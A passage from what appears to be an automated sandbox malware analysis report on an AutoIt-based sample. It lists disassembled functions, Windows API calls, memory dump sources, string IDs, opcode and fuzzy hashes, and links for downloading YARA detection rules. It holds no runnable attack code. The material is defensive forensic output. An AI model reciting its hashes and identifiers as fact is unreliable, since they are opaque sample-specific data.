                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: 60271037ce1362ede9d3bf4bb1170471045b0514c792ac25e3223f06f7aa7c40
                          • Instruction ID: ab4547ea1cccd38518e83da652d7521cd04e54da38d47670fa5bb810b083a51a
                          • Opcode Fuzzy Hash: 60271037ce1362ede9d3bf4bb1170471045b0514c792ac25e3223f06f7aa7c40
                          • Instruction Fuzzy Hash: E3E09B7290422D2BD7209A95AC09F9BFBACEB55761F010057BD08D3151E5A06A458BD1
                          Function 00568675 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00568683
                            • Part of subcall function 005334BA: _doexit.LIBCMT ref: 005334C4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: ff3db15e9b13ddb36383835f04901a29c0276052266bb9ce69688cd9ed020603
                          • Instruction ID: a9aa13bfebac461f46eca33d759318f484bab24e89d347f3794e07fadfeabd97
                          • Opcode Fuzzy Hash: ff3db15e9b13ddb36383835f04901a29c0276052266bb9ce69688cd9ed020603
                          • Instruction Fuzzy Hash: BBD05B313C531836D2153798EC1FFDA7F886F56B55F140455BB04561C34DD7959042D5
                          Function 00550181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?), ref: 0054FFC1
                            • Part of subcall function 0058C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,005501AA,?), ref: 0058C4AF
                            • Part of subcall function 0058C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C4C1
                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005501B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                          • String ID: WIN_XPe
                          • API String ID: 582185067-3257408948
                          • Opcode ID: 161c5b8471d484f65361dcbe2c8a382c6ab9bf4095a9510867643e39878fdec7
                          • Instruction ID: f8db0126472004805589ea229a17e4c59436d9fb217b685c760628003f9549bb
                          • Opcode Fuzzy Hash: 161c5b8471d484f65361dcbe2c8a382c6ab9bf4095a9510867643e39878fdec7
                          • Instruction Fuzzy Hash: 98F03970819119EFCB15DB98C998AECBFB8BB0A308F200496E102A21A0C7704F88DF20
                          Function 00525800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyIcon.USER32(,j]0j],005D6A2C,005D6890,?,00525A53,005D6A2C,005D6A30,?,00000004), ref: 00525823
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: DestroyIcon
                          • String ID: ,j]0j]$SZR,j]0j]
                          • API String ID: 1234817797-3602736661
                          • Opcode ID: 9fd3f7461e0316a75c7bcee8e67970d9149e658035df18f4e6bc93e1e9161e89
                          • Instruction ID: ddac7eb01083ffe0f3a531c0dfc16bf56613a83662acd23568ee607f365aac58
                          • Opcode Fuzzy Hash: 9fd3f7461e0316a75c7bcee8e67970d9149e658035df18f4e6bc93e1e9161e89
                          • Instruction Fuzzy Hash: 30E0C232014216EBE7200F08E8007A4FFE8FF22321F34C416E08056090E3F168A0DB90